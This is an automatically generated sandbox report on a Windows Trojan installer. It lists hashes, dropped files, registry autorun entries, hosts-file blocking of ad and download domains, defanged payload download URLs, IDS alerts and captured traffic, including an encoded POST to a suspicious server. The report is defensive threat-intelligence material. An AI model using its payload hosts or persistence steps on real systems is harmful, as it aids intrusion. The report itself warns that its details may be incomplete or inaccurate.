Trojan.MSIL.DOTHETUK.jez_c4fa995d7e

by malwarelabrobot on September 29th, 2017 in Malware Descriptions.

Trojan.MSIL.DOTHETUK.jez (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: c4fa995d7ed1670ba8f720242f87dde6
SHA1: 31c1d7fd52f76345de4299c1586f39c7ea7c9280
SHA256: daf2e16d4b2fc634054d9beacaa2e0c73ef083c01f648086e739c16c69adbaa5
SSDeep: 12288:1Qi3vJwdFszzh1N1J96n1ex9KhjHLZeBQNP0:1QifJwdF4N1yn1eXmjYYP0
Size: 492588 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

c4fa995d7ed1670ba8f720242f87dde6.tmp:3404
dw.exe:3584
DOCPSADOPK.exe:3808
%original file name%.exe:1796

The Trojan injects its code into the following process(es):

OPLKIDMWLL.exe:2892
UBWBZWLKRG.exe:948

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process c4fa995d7ed1670ba8f720242f87dde6.tmp:3404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\dw.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\itdownload.dll (1489 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\_isetup\_shfoldr.dll (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\dw.exe (12675 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\dw.exe.config (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\dw.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\_isetup\_shfoldr.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\_isetup (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\itdownload.dll (0 bytes)

The process OPLKIDMWLL.exe:2892 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\drivers\etc\hosts (1 bytes)

The process dw.exe:3584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Mozilla Firefox\UDKKVOSOVF\CHXOCZMVSI.exe (243 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\OPLKIDMWLL.exe (233 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\OPLKIDMWLL.exe.config (1 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\DOCPSADOPK.cfg (88 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\OPLKIDMWLL.cfg (88 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\DOCPSADOPK.exe.config (1 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\UBWBZWLKRG.exe (833 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\DOCPSADOPK.exe (1136 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (844 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\UBWBZWLKRG.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (844 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\UBWBZWLKRG.cfg (88 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\CHXOCZMVSI.cfg (88 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\CHXOCZMVSI.exe.config (1 bytes)

The process DOCPSADOPK.exe:3808 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (872 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (872 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\DOCPSADOPK.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (872 bytes)

The Trojan deletes the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.3808.346213 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3808.346213 (0 bytes)

The process %original file name%.exe:1796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UDAF0.tmp\c4fa995d7ed1670ba8f720242f87dde6.tmp (1622 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UDAF0.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UDAF0.tmp\c4fa995d7ed1670ba8f720242f87dde6.tmp (0 bytes)

Registry activity

The process c4fa995d7ed1670ba8f720242f87dde6.tmp:3404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\c4fa995d7ed1670ba8f720242f87dde6_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\RestartManager\Session0000]
"SessionHash" = "9E 30 E3 12 E0 A3 51 9D 9F 9A 40 B9 9B 81 DD DB"

[HKLM\SOFTWARE\Microsoft\Tracing\c4fa995d7ed1670ba8f720242f87dde6_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\c4fa995d7ed1670ba8f720242f87dde6_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Owner" = "4C 0D 00 00 18 A8 F6 8C 07 38 D3 01"

[HKLM\SOFTWARE\Microsoft\Tracing\c4fa995d7ed1670ba8f720242f87dde6_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\c4fa995d7ed1670ba8f720242f87dde6_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\c4fa995d7ed1670ba8f720242f87dde6_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\c4fa995d7ed1670ba8f720242f87dde6_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\c4fa995d7ed1670ba8f720242f87dde6_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\RestartManager\Session0000]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence"
"SessionHash"
"Owner"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
"AutoConfigURL"

The process dw.exe:3584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\dw_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Printers\Ippolito]
"Sikkes" = "09/28/2017 06:12:08"
"Ofrah" = "08:00:00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\System\CurrentControlSet\Control\Print]
"reinstall_drivers" = "3bje16uWXYAVJ8EWhxV05Jpn4lBzO9G3NOAf1kn8HcA="

[HKLM\SOFTWARE\Microsoft\Tracing\dw_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\dw_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\dw_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCU\Software\Nowidget]
"State" = "Success"

[HKLM\SOFTWARE\Microsoft\Tracing\dw_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\dw_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\dw_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\dw_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\dw_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process DOCPSADOPK.exe:3808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\DOCPSADOPK_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\DOCPSADOPK_RASAPI32]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\DOCPSADOPK_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\DOCPSADOPK_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\DOCPSADOPK_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\DOCPSADOPK_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\DOCPSADOPK_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\DOCPSADOPK_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\DOCPSADOPK_RASMANCS]
"EnableConsoleTracing" = "0"

To run itself automatically each time Windows boots, the Trojan adds the following reference to its file under the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"DOCPSADOPK.exe" = "%Program Files%\Mozilla Firefox\UDKKVOSOVF\DOCPSADOPK.exe"

The process UBWBZWLKRG.exe:948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASMANCS]
"MaxFileSize" = "1048576"

To run itself automatically each time Windows boots, the Trojan adds the following reference to its file under the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"UBWBZWLKRG.exe" = "%Program Files%\Mozilla Firefox\UDKKVOSOVF\UBWBZWLKRG.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 File path
98d637ab2a82bddc0bdd83f7d1058400 c:\Program Files\Mozilla Firefox\UDKKVOSOVF\CHXOCZMVSI.exe
ab0627f1df2476e7e87ee42f54a87511 c:\Program Files\Mozilla Firefox\UDKKVOSOVF\DOCPSADOPK.exe
b74370f9fbb85f71ff85225852fd7446 c:\Program Files\Mozilla Firefox\UDKKVOSOVF\OPLKIDMWLL.exe
2bcb8b3244b045e0161aaeba45b0735c c:\Program Files\Mozilla Firefox\UDKKVOSOVF\UBWBZWLKRG.exe
ad7ce1d4a70bb4a5b1731faebe1af863 c:\Program Files\VMware\IMMWDEWSFY\QUSEWTHJKZ.exe

HOSTS file anomalies

The Trojan modifies the "%System%\drivers\etc\hosts" file, which is used to map host names to IP addresses.
The modified file is 1872 bytes in size. The following strings are added to the hosts file:

127.0.0.1 validation.sls.microsoft.com
127.0.0.1 wemsofts.com
127.0.0.1 bongadoom.com
127.0.0.1 wepcmainsystem.com
127.0.0.1 internalcampaigntargets.com
127.0.0.1 bongadoom.com
127.0.0.1 getthefilenow.com
127.0.0.1 bigpicturepop.com
127.0.0.1 wizzcaster.com
127.0.0.1 bestoffersfortoday.com
127.0.0.1 wepcmainsystem.com
127.0.0.1 agent.wizztrakys.com
127.0.0.1 csdimonetize.com
127.0.0.1 dl.azalee.site
127.0.0.1 titiaredh.com
127.0.0.1 wepcdisplaysystem.com
127.0.0.1 wepcanalyticsystem.com
127.0.0.1 healthydownload.com
127.0.0.1 leading2download.com
127.0.0.1 dwl0.wizzlabs.com
127.0.0.1 dwl1.wizzlabs.com
127.0.0.1 mess1.wizzmonetize.com
127.0.0.1 dl.azalee.site
127.0.0.1 dl.smashdl.com
127.0.0.1 downloadmyhost.com
127.0.0.1 lapapahoster.com
127.0.0.1 bratitlamio.com
127.0.0.1 mess1.wizzmonetize.com
127.0.0.1 dl.wizzuniquify.com
127.0.0.1 wizzmonetize.com
127.0.0.1 laserveradedomaina.com


Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: 016
Product Version: 4.2
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description: 016 Setup
Comments: This installation was built with Inno Setup.
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 40240 40448 4.59678 611a4d7a24dd9b18a256468a5d7453f5
DATA 45056 592 1024 1.90942 2f7f9f859c8b4b133abf78cebd99cc90
BSS 49152 3728 0 0 d41d8cd98f00b204e9800998ecf8427e
.idata 53248 2384 2560 3.07115 bb5485bf968b970e5ea81292af2acdba
.tls 57344 8 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 61440 24 512 0.14174 9ba824905bf9c7922b6fc87a38b74366
.reloc 65536 2244 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 69632 110660 111104 1.85254 668649b89fb7d6d977db8bc1c1af5a19

Dropped from:

94df91a4c39f8578be321137aa5d4e54

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://mydownloaddomain.com/Download/Domain/dw.exe 5.135.84.92
hxxp://htagzdownload.pw/Series/Conumer1Pirlo.php 51.254.189.96
hxxp://smarttrackk.xyz/temptrack/Store 193.70.81.176
hxxp://mydownloaddomain.com/HNK45/FTGHUIO6/Dance.exe 5.135.84.92
hxxp://mydownloaddomain.com/uploads/akil/xx13.exe 5.135.84.92
hxxp://mydownloaddomain.com/uploads/akil/xx12.exe 5.135.84.92
hxxp://mydownloaddomain.com/uploads/EmreExe/Recover.exe 5.135.84.92
hxxp://mydownloaddomain.com/HNK45/FTGHUIO6/Twerk.exe 5.135.84.92
hxxp://www.google.com/ 172.217.20.196
hxxp://www.google.com.ua/?gfe_rd=cr&dcr=0&ei=iWjMWZLmJcLi8AfJxbrgDQ 172.217.20.163
hxxp://htagzdownload.pw/Series/Conumer4Publisher.php 51.254.189.96
hxxp://htagzdownload.pw/Series/Movie/Ragnar/2/UA.json 51.254.189.96
hxxp://htagzdownload.pw/Series/Conumer2kenpachi.php 51.254.189.96
hxxp://htagzdownload.pw/Series/dracarysfisormek/2/goodchannel/UA.json 51.254.189.96
hxxp://htagzdownload.pw/Series/daenerystargaryen/2/goodchannel.json 51.254.189.96
hxxp://apps.digsigtrust.com/roots/dstrootcax3.p7c
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
hxxp://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf/EFWCFiRACEAoBQUIAAAFThXNqC4Xspwg= 192.35.177.195
hxxp://a771.dscq.akamai.net/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgNjdonEncxBy5w7PlZkeo4nVg==
hxxp://ocsp.godaddy.com.akadns.net//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ== 50.63.243.230
hxxp://ocsp.godaddy.com.akadns.net//MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc= 50.63.243.230
hxxp://ocsp.godaddy.com.akadns.net//MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDB+8Myi49ySg== 50.63.243.230
hxxp://d.gcdn.co/pokermatch/podarok200/images/logo-pokermatch.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/chip-3.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/chip-1.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/f-icon-2.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/f-icon-3.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/f-icon-4.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/f-icon-5.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/f-icon-6.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/app-windows.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/app-macos-x.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/app-google-play.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/app-ios.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/text-200uah.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/chip-2.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/f-icon-1.png
hxxp://gdcrl.godaddy.com.akadns.net/gdig2s1-455.crl
hxxp://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI= 178.255.83.1
hxxp://cs9.wac.phicdn.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8=
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/app-windows.png 1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/f-icon-4.png 1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/logo-pokermatch.png 1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/chip-2.png 1.100.192.22
hxxp://apps.identrust.com/roots/dstrootcax3.p7c 192.35.177.64
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/app-google-play.png 1.100.192.22
hxxp://ocsp.int-x3.letsencrypt.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgNjdonEncxBy5w7PlZkeo4nVg== 2.21.240.107
hxxp://ocsp.godaddy.com//MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc= 50.63.243.230
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/app-ios.png 1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/chip-1.png 1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/f-icon-1.png 1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/f-icon-6.png 1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/f-icon-3.png 1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/app-macos-x.png 1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/f-icon-2.png 1.100.192.22
hxxp://crl.godaddy.com/gdig2s1-455.crl 50.63.243.228
hxxp://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ== 50.63.243.230
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/chip-3.png 1.100.192.22
hxxp://ocsp.godaddy.com//MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDB+8Myi49ySg== 50.63.243.230
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab 92.123.155.48
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/text-200uah.png 1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/f-icon-5.png 1.100.192.22
hxxp://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8= 93.184.220.29
promo.pokermatch.com 88.208.33.209
syndication.exdynsrv.com 95.211.229.246
google.com 172.217.20.206
cdn.gravitec.net 91.239.235.23
teredo.ipv6.microsoft.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
ET POLICY PE EXE or DLL Windows file download HTTP
ET POLICY Terse Named Filename EXE Download - Possibly Hostile
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8= HTTP/1.1
Cache-Control: max-age = 511667
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 13 Oct 2016 04:57:34 GMT
If-None-Match: "57ff143e-1d7"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.com


HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=172800
Content-Type: application/ocsp-response
Date: Thu, 28 Sep 2017 03:12:58 GMT
Etag: "59cc26af-1d7"
Expires: Sat, 30 Sep 2017 03:12:58 GMT
Last-Modified: Wed, 27 Sep 2017 22:31:11 GMT
Server: ECS (vie/F2D5)
X-Cache: HIT
Content-Length: 471
0..........0..... .....0......0...0.......>.i...G...&....cd ...2017
0926220000Z0s0q0I0... ............(..A...B..G@B.X....>.i...G...&...
.cd ........\..m. B.]......20170926220000Z....20171003220000Z0...*.H..
................A...]"..U....jd..;..}F.......>{Y..6.PC.i..RZ..C.=..
|........m.KYD..PH..._.$....;W..o.......).../...t1$.QR.?:...&.@..-T..}
...@....F...q....17.....J.......J...Lt....N....W.......:4e.veF.......@
#UBX......`]..`....!.gg.@...M..p....|u.F..<d.m.|.^:...l.B..HTTP/1.
1 200 OK..Accept-Ranges: bytes..Cache-Control: max-age=172800..Content
-Type: application/ocsp-response..Date: Thu, 28 Sep 2017 03:12:58 GMT.
.Etag: "59cc26af-1d7"..Expires: Sat, 30 Sep 2017 03:12:58 GMT..Last-Mo
dified: Wed, 27 Sep 2017 22:31:11 GMT..Server: ECS (vie/F2D5)..X-Cache
: HIT..Content-Length: 471..0..........0..... .....0......0...0.......
>.i...G...&....cd ...20170926220000Z0s0q0I0... ............(..A...B
..G@B.X....>.i...G...&....cd ........\..m. B.]......20170926220000Z
....20171003220000Z0...*.H..................A...]"..U....jd..;..}F....
...>{Y..6.PC.i..RZ..C.=..|........m.KYD..PH..._.$....;W..o.......).
../...t1$.QR.?:...&.@..-T..}...@....F...q....17.....J.......J...Lt....
N....W.......:4e.veF.......@ #UBX......`]..`....!.gg.@...M..p....|u.F.
.<d.m.|.^:...l.B....

<<< skipped >>>

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgNjdonEncxBy5w7PlZkeo4nVg== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.int-x3.letsencrypt.org


HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 527
ETag: "776C990E2D90416A6E43881D116898B805FA84DA3E6646542237076A2092BD58"
Last-Modified: Tue, 26 Sep 2017 10:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9588
Expires: Thu, 28 Sep 2017 05:52:21 GMT
Date: Thu, 28 Sep 2017 03:12:33 GMT
Connection: keep-alive
0..........0..... .....0......0...0...L0J1.0...U....US1.0...U....Let's
Encrypt1#0!..U....Let's Encrypt Authority X3..20170926102300Z0u0s0K0.
.. ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee........cv....A..;>
Vdz.'V....20170926100000Z....20171003100000Z0...*.H.............%....&
gt;..5"..k..Z...q.9....e]......I...D....1.^6.......k...(_.L.?........6
V'......>.-....!.....H..../a.TX..(...Q...~..~`.....Zf....8V..\j...;
..-v..x...p.w.fO.N".D.AT..].V.....}..?../!..u..3:%...Z?m....aA..X4..].
....^z..l....Qn..L........-...Y...O=..........HTTP/1.1 200 OK..Server:
nginx..Content-Type: application/ocsp-response..Content-Length: 527..
ETag: "776C990E2D90416A6E43881D116898B805FA84DA3E6646542237076A2092BD5
8"..Last-Modified: Tue, 26 Sep 2017 10:00:00 UTC..Cache-Control: publi
c, no-transform, must-revalidate, max-age=9588..Expires: Thu, 28 Sep 2
017 05:52:21 GMT..Date: Thu, 28 Sep 2017 03:12:33 GMT..Connection: kee
p-alive..0..........0..... .....0......0...0...L0J1.0...U....US1.0...U
....Let's Encrypt1#0!..U....Let's Encrypt Authority X3..20170926102300
Z0u0s0K0... ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee........cv...
.A..;>Vdz.'V....20170926100000Z....20171003100000Z0...*.H..........
...%....>..5"..k..Z...q.9....e]......I...D....1.^6.......k...(_.L.?
........6V'......>.-....!.....H..../a.TX..(...Q...~..~`.....Zf....8
V..\j...;..-v..x...p.w.fO.N".D.AT..].V.....}..?../!..u..3:%...Z?m....a
A..X4..].....^z..l....Qn..L........-...Y...O=............

<<< skipped >>>

POST /Series/Conumer2kenpachi.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: htagzdownload.pw
Content-Length: 53
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



charizar=A5wGycGnuqFFGLQczpRIbh53b1gu3AGAo5ty9EN5tEg=


HTTP/1.1 200 OK

Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 28 Sep 2017 03:12:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
